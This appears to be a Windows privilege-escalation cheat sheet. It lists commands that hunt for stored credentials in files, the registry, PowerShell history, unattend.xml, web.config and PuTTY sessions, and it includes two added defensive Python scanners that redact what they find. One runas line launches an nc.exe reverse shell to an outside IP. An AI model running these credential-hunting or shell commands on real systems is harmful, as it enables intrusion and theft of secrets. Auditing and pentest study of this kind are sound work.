Common Commands and searches
Search for hidden files
- dir /a C:\
Search for file names and contents
- dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config* == *user*
- findstr /SI "passw pwd" *.xml *.ini *.txt *.ps1 *.bat *.config
- dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
Search for passwords in registry
- reg query HKLM /f password /t REG_SZ /s
- reg query HKCU /f password /t REG_SZ /s
Read the Registry
- reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
- reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"
- reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
- reg query "HKCU\Software\ORL\WinVNC3\Password"
- reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password
- reg query "HKCU\Software\TightVNC\Server"
- reg query "HKCU\Software\OpenSSH\Agent\Keys"
Hunting for SAM and SYSTEM Backups
- cd C:\ & dir /S /B SAM == SYSTEM == SAM.OLD == SYSTEM.OLD == SAM.BAK == SYSTEM.BAK
Check permissions
- icacls "C:\Windows\System32\Config\Regback"
Interesting locations
- C:\Windows\sysprep\sysprep.xml
- C:\Windows\sysprep\sysprep.inf
- C:\Windows\sysprep.inf
- C:\Windows\Panther\Unattended.xml
- C:\Windows\Panther\Unattend.xml
- C:\Windows\Panther\Unattend\Unattend.xml
- C:\Windows\Panther\Unattend\Unattended.xml
- C:\Windows\System32\Sysprep\unattend.xml
- C:\Windows\System32\Sysprep\unattended.xml
- C:\unattend.txt
- C:\unattend.inf
- VARIABLES.DAT
- setupinfo
- setupinfo.bak
- web.config
- SiteList.xml
- .aws\credentials
- .azure\accessTokens.json
- .azure\azureProfile.json
- gcloud\credentials.db
- gcloud\legacy_credentials
- gcloud\access_tokens.db
Chrome Password
- gc 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt' | Select-String password
Unattended Windows Installations
When installing Windows on a large number of hosts, administrators may use Windows Deployment Services, which allows for a single operating system image to be deployed to several hosts through the network. These kinds of installations are referred to as unattended installations as they don’t require user interaction. Such installations require the use of an administrator account to perform the initial setup, which might end up being stored in the machine in the following locations:
- C:\Unattend.xml
- C:\Windows\Panther\Unattend.xml
- C:\Windows\Panther\Unattend\Unattend.xml
- C:\Windows\system32\sysprep.inf
- C:\Windows\system32\sysprep\sysprep.xml
Powershell History
Whenever a user runs a command using PowerShell, it gets stored in a file that keeps a record of past commands. This is useful for quickly repeating commands you have used before. If a user runs a command that includes a password directly as part of the PowerShell command line, it can later be retrieved with the following command from a cmd.exe prompt:
- type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
- type C:\Users\bob\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
- (Get-PSReadLineOption).HistorySavePath
- gc (Get-PSReadLineOption).HistorySavePath
- foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}
Note: The %userprofile% variant only works from cmd.exe, as PowerShell won't expand %userprofile% as an environment variable. To read the file from PowerShell, replace %userprofile% with $Env:userprofile
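As an added, defender-side example that is not part of the original page: a Python scanner that reads PSReadLine history lines, flags commands that carried a literal credential on the command line (the situation described above), and returns the matching lines with the secret redacted so the report itself does not leak it. The sample history lines are constructed, not a real capture; the regex patterns, the `_is_literal` rule (ignore `$variables`, `(expressions)` and the `*` prompt marker) and the `history_paths` helper are my own assumptions about what a first-pass audit should look for.

```python
import os
import re
from pathlib import Path

# Each entry: (label, regex). The named group "secret" is the token that would
# be a literal credential. Specific patterns come first so they win over the
# generic "-password <x>" one. These shapes are assumptions, not an exhaustive list.
CREDENTIAL_PATTERNS = [
    ("securestring-plaintext",
     re.compile(r"ConvertTo-SecureString\s+(?P<secret>\"[^\"]*\"|'[^']*'|\S+)\s+-AsPlainText", re.I)),
    ("net-use",
     re.compile(r"\bnet\s+use\b.*?/user:\S+\s+(?P<secret>\S+)", re.I)),
    ("cmdkey",
     re.compile(r"\bcmdkey\b.*?/pass:(?P<secret>\S+)", re.I)),
    ("connection-string",
     re.compile(r"\b(?:password|pwd)\s*=\s*(?P<secret>[^;\"'\s]+)", re.I)),
    ("powershell-param",
     re.compile(r"[-/](?:password|passwd|pwd|pass|secret|token)[=:\s]+(?P<secret>\"[^\"]*\"|'[^']*'|\S+)", re.I)),
]


def _is_literal(secret):
    """A '*' (interactive prompt), an empty quoted string, or a $variable/(expression) is not a literal secret."""
    return secret not in ("*", '""', "''") and secret[0] not in "$("


def scan_history_lines(lines):
    """Return [(line_number, label, redacted_line)] for lines that carry a literal credential."""
    findings = []
    for lineno, line in enumerate(lines, start=1):
        for label, pattern in CREDENTIAL_PATTERNS:
            m = pattern.search(line)
            if m is None or not _is_literal(m.group("secret")):
                continue
            redacted = line[:m.start("secret")] + "<REDACTED>" + line[m.end("secret"):]
            findings.append((lineno, label, redacted))
            break  # one finding per line is enough for triage
    return findings


def history_paths(users_root=None):
    """PSReadLine history file for every profile under C:\\Users (returns [] off Windows)."""
    root = Path(users_root or os.environ.get("SystemDrive", "C:") + "\\Users")
    rel = Path("AppData") / "Roaming" / "Microsoft" / "Windows" / "PowerShell" / "PSReadLine" / "ConsoleHost_history.txt"
    if not root.is_dir():
        return []
    return [p / rel for p in root.iterdir() if (p / rel).is_file()]


def scan_history_files(paths):
    """Scan the given history files; returns {path: findings} only for files with at least one hit."""
    results = {}
    for path in paths:
        try:
            lines = Path(path).read_text(encoding="utf-8", errors="replace").splitlines()
        except OSError:
            continue
        hits = scan_history_lines(lines)
        if hits:
            results[str(path)] = hits
    return results


# Constructed sample history (not a real capture): literal secrets plus the
# non-literal cases the scanner must ignore (prompted credential, $variable, '*').
SAMPLE_HISTORY = [
    "Get-ChildItem C:\\inetpub",
    "$cred = Get-Credential",
    "New-LocalUser svc_backup -Password (ConvertTo-SecureString 'Summer2023!' -AsPlainText -Force)",
    "net use Z: \\\\fileserver\\share /user:CORP\\bob hunter2",
    "Invoke-Sqlcmd -ServerInstance db01 -Query 'select 1' -Username sa -Password S3cret!",
    "cmdkey /add:db01 /user:CORP\\svc /pass:Winter2024",
    "$cs = 'Server=db01;Database=app;User Id=app;Password=Pa55w0rd;'",
    "Connect-Something -Password $cred.GetNetworkCredential().Password",
    "net use Y: \\\\fs\\share /user:CORP\\alice *",
]

if __name__ == "__main__":
    for lineno, label, line in scan_history_lines(SAMPLE_HISTORY):
        print(f"line {lineno:3} [{label}] {line}")
    for path, hits in scan_history_files(history_paths()).items():
        print(f"{path}: {len(hits)} finding(s)")
```

Run as-is it reports five of the nine constructed lines and skips the three that pass a variable, a prompt marker or nothing at all; on a Windows host it then walks every profile's history file. The redacted output is what should go into a ticket, and the remediation is to clear the file and move the affected credential to a prompt or a credential store rather than a command-line literal.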
Saved Windows Credentials
Windows allows us to use other users’ credentials. This function also gives the option to save these credentials on the system. The command below will list saved credentials:
- cmdkey /list
While you can’t see the actual passwords, if you notice any credentials worth trying, you can use them with the runas command and the /savecred option, as seen below.
- runas /savecred /user:admin cmd.exe
- runas /env /noprofile /savecred /user:DESKTOP-T3I4BBK\administrator "c:\temp\nc.exe 172.16.1.30 443 -e cmd.exe"
IIS Configuration
Internet Information Services (IIS) is the default web server on Windows installations. The configuration of websites on IIS is stored in a file called web.config and can store passwords for databases or configured authentication mechanisms. Depending on the installed version of IIS, we can find web.config in one of the following locations:
- C:\inetpub\wwwroot\web.config
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
Here is a quick way to find database connection strings on the file:
- type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString
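Both the unattended-installation section above and this IIS section come down to the same audit question: does an XML file on the host still hold a readable credential? The following Python is an added example, not part of the original page, that parses both formats with the standard library: `audit_unattend` reports every `*Password` element in an unattend.xml whose `Value` has not been wiped (Setup replaces consumed values with `*SENSITIVE*DATA*DELETED*`), noting whether it is `PlainText` or only base64-encoded, and `audit_web_config` reports connection strings that carry a password while skipping sections that aspnet_regiis has encrypted (`configProtectionProvider` set). The two sample files are constructed; the element-path format and the redaction marker are my own choices.

```python
import base64
import re
import xml.etree.ElementTree as ET

# Values Windows Setup leaves behind once it has consumed a password from the file.
SANITIZED_VALUES = {"", "*SENSITIVE*DATA*DELETED*"}

# Secret inside a connection string: everything after password=/pwd= up to the next ';'.
CONN_SECRET = re.compile(r"\b(?:password|pwd)\s*=\s*(?P<secret>[^;]+)", re.I)


def _local(tag):
    """'{urn:schemas-microsoft-com:unattend}Password' -> 'Password'."""
    return tag.rsplit("}", 1)[-1]


def _child(el, name):
    return next((c for c in el if _local(c.tag) == name), None)


def audit_unattend(xml_text):
    """Return [(element_path, is_plaintext)] for every *Password element that still holds a value.

    Non-plaintext values are base64 of UTF-16LE text (the password with the element name
    appended): reversible encoding, not encryption, so both cases are reported.
    """
    root = ET.fromstring(xml_text)
    parents = {child: parent for parent in root.iter() for child in parent}
    findings = []
    for el in root.iter():
        if not _local(el.tag).endswith("Password"):
            continue
        value = _child(el, "Value")
        if value is None or (value.text or "").strip() in SANITIZED_VALUES:
            continue
        plain = _child(el, "PlainText")
        is_plain = plain is not None and (plain.text or "").strip().lower() == "true"
        # Build a readable path such as unattend/settings/component/AutoLogon/Password
        path, node = [], el
        while node is not None:
            path.append(_local(node.tag))
            node = parents.get(node)
        findings.append(("/".join(reversed(path)), is_plain))
    return findings


def audit_web_config(xml_text):
    """Return [{'name', 'connectionString'}] for connection strings holding a readable password.

    Sections protected with aspnet_regiis carry configProtectionProvider and only ciphertext,
    so they are skipped; Integrated Security / SSPI entries carry no password at all.
    """
    root = ET.fromstring(xml_text)
    findings = []
    for section in root.iter("connectionStrings"):
        if section.get("configProtectionProvider"):
            continue
        for add in section.iter("add"):
            conn = add.get("connectionString", "")
            m = CONN_SECRET.search(conn)
            if m is None or not m.group("secret").strip():
                continue
            redacted = conn[:m.start("secret")] + "<REDACTED>" + conn[m.end("secret"):]
            findings.append({"name": add.get("name"), "connectionString": redacted})
    return findings


# Constructed samples (not real files). The AutoLogon value is built the way Setup stores
# it, so the sample shows the encoding without hard-coding an opaque blob.
_encoded_autologon = base64.b64encode(("Pa55w0rd" + "Password").encode("utf-16-le")).decode()

SAMPLE_UNATTEND = f"""<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Password><Value>{_encoded_autologon}</Value><PlainText>false</PlainText></Password>
        <Enabled>true</Enabled><Username>Administrator</Username>
      </AutoLogon>
      <UserAccounts>
        <AdministratorPassword><Value>*SENSITIVE*DATA*DELETED*</Value><PlainText>false</PlainText></AdministratorPassword>
        <LocalAccounts><LocalAccount>
          <Password><Value>Summer2023!</Value><PlainText>true</PlainText></Password><Name>svc</Name>
        </LocalAccount></LocalAccounts>
      </UserAccounts>
    </component>
  </settings>
</unattend>"""

SAMPLE_WEB_CONFIG = """<configuration>
  <connectionStrings>
    <add name="AppDb" providerName="System.Data.SqlClient"
         connectionString="Server=db01;Database=app;User Id=app;Password=Pa55w0rd;" />
    <add name="Reporting" connectionString="Server=db02;Database=rpt;Integrated Security=SSPI;" />
  </connectionStrings>
</configuration>"""

SAMPLE_PROTECTED_WEB_CONFIG = """<configuration>
  <connectionStrings configProtectionProvider="RsaProtectedConfigurationProvider">
    <EncryptedData><CipherData><CipherValue>placeholder-ciphertext</CipherValue></CipherData></EncryptedData>
  </connectionStrings>
</configuration>"""

if __name__ == "__main__":
    for path, is_plain in audit_unattend(SAMPLE_UNATTEND):
        print(f"unattend: {path} ({'plaintext' if is_plain else 'base64-encoded'})")
    for hit in audit_web_config(SAMPLE_WEB_CONFIG) + audit_web_config(SAMPLE_PROTECTED_WEB_CONFIG):
        print(f"web.config: {hit['name']}: {hit['connectionString']}")
```

Against the samples the unattend audit reports the AutoLogon password (encoded) and the local-account password (plaintext) but not the administrator password that Setup already wiped, and the web.config audit reports only `AppDb`: the SSPI entry has nothing to leak and the protected section is ciphertext. To audit a real host, feed the file contents from the paths listed above into the two functions; the fix for a hit is to remove the unattend file (or the value) and to encrypt the `connectionStrings` section with aspnet_regiis.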
Retrieve Credentials from Software: PuTTY
PuTTY is an SSH client commonly found on Windows systems. Instead of having to specify a connection’s parameters every single time, users can store sessions where the IP, user and other configurations can be stored for later use. While PuTTY won’t allow users to store their SSH password, it will store proxy configurations that include cleartext authentication credentials.
To retrieve the stored proxy credentials, you can search under the following registry key for ProxyPassword with the following command:
- reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions /f "Proxy" /s